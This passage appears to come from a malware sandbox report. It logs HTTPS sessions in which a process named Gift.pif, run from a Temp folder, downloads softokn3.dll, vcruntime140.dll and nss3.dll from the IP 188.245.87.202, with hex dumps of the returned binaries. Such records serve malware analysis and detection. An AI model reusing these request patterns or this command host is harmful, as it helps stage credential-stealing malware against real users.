                                                                        2024-08-05 16:56:11 UTC16384INData Raw: 01 75 04 3b d7 74 3a 8b 5d 08 6a 04 59 89 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03
                                                                        Data Ascii: u;t:]jYMS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s
                                                                        2024-08-05 16:56:11 UTC16384INData Raw: cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00
                                                                        Data Ascii: UQEVuF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv|i
                                                                        2024-08-05 16:56:11 UTC16384INData Raw: 73 00 00 84 c0 0f 85 d3 00 00 00 8b 5d ec 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01
                                                                        Data Ascii: s]u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tW


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        14192.168.2.549727188.245.87.202443748C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-08-05 16:56:13 UTC245OUTGET /softokn3.dll HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:13 UTC260INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:13 GMT
                                                                        Content-Type: application/octet-stream
                                                                        Content-Length: 257872
                                                                        Connection: close
                                                                        Last-Modified: Monday, 05-Aug-2024 16:56:13 GMT
                                                                        Cache-Control: no-store, no-cache
                                                                        Accept-Ranges: bytes
                                                                        2024-08-05 16:56:13 UTC16124INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00
                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
                                                                        2024-08-05 16:56:13 UTC16384INData Raw: 85 f0 fe ff ff 00 00 00 00 8d 85 ec fe ff ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 f0 81
                                                                        Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP|*USWV1E0=(tM1(
                                                                        2024-08-05 16:56:13 UTC16384INData Raw: 03 45 dc 56 8d 4d ec 51 50 57 e8 55 9e ff ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 bf 4d
                                                                        Data Ascii: EVMQPWUkWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGPM
                                                                        2024-08-05 16:56:13 UTC16384INData Raw: 88 41 02 0f b6 41 03 d1 e8 8a 80 68 f9 02 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 00 00
                                                                        Data Ascii: AAhAAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q
                                                                        2024-08-05 16:56:13 UTC16384INData Raw: 84 30 07 00 00 83 7b 08 14 0f 84 43 01 00 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02 00
                                                                        Data Ascii: 0{C!=P=Qt-=Rt=UG{{G|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#
                                                                        2024-08-05 16:56:13 UTC16384INData Raw: 5d c3 cc cc 55 89 e5 53 57 56 83 ec 10 a1 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00 74
                                                                        Data Ascii: ]USWV1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=Pt
                                                                        2024-08-05 16:56:13 UTC16384INData Raw: 75 20 85 f6 7e 7a 8b 7d 1c 83 c7 08 c7 45 d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4
                                                                        Data Ascii: u ~z}EEGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZ
                                                                        2024-08-05 16:56:13 UTC16384INData Raw: 75 08 e8 4d 2b 00 00 83 c4 04 85 c0 74 51 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00
                                                                        Data Ascii: uM+tQH8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.
                                                                        2024-08-05 16:56:13 UTC16384INData Raw: 00 5d c3 b8 00 00 08 00 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c
                                                                        Data Ascii: ]]USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4|
                                                                        2024-08-05 16:56:13 UTC16384INData Raw: c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18
                                                                        Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        15192.168.2.549728188.245.87.202443748C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-08-05 16:56:14 UTC249OUTGET /vcruntime140.dll HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:15 UTC259INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:14 GMT
                                                                        Content-Type: application/octet-stream
                                                                        Content-Length: 80880
                                                                        Connection: close
                                                                        Last-Modified: Monday, 05-Aug-2024 16:56:14 GMT
                                                                        Cache-Control: no-store, no-cache
                                                                        Accept-Ranges: bytes
                                                                        2024-08-05 16:56:15 UTC16125INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22
                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"
                                                                        2024-08-05 16:56:15 UTC16384INData Raw: 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c 3b 42
                                                                        Data Ascii: t3MNB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F;B
                                                                        2024-08-05 16:56:15 UTC16384INData Raw: 8b 45 94 a3 a4 f2 00 10 8d 45 cc 50 e8 39 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 74 20
                                                                        Data Ascii: EEP9Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMGt
                                                                        2024-08-05 16:56:15 UTC16384INData Raw: c9 00 08 00 00 83 e2 18 74 1c 83 fa 08 74 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f 85 12
                                                                        Data Ascii: ttt@++t+t+u+uQ<0|*<9&w/c5~bASJCtv
                                                                        2024-08-05 16:56:15 UTC15603INData Raw: 8f f8 b4 e9 00 40 03 d5 1c 16 4c d1 c1 d6 ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f
                                                                        Data Ascii: @L|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicroso


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        16192.168.2.549729188.245.87.202443748C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-08-05 16:56:16 UTC241OUTGET /nss3.dll HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:16 UTC261INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:16 GMT
                                                                        Content-Type: application/octet-stream
                                                                        Content-Length: 2046288
                                                                        Connection: close
                                                                        Last-Modified: Monday, 05-Aug-2024 16:56:16 GMT
                                                                        Cache-Control: no-store, no-cache
                                                                        Accept-Ranges: bytes
                                                                        2024-08-05 16:56:16 UTC16123INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00
                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
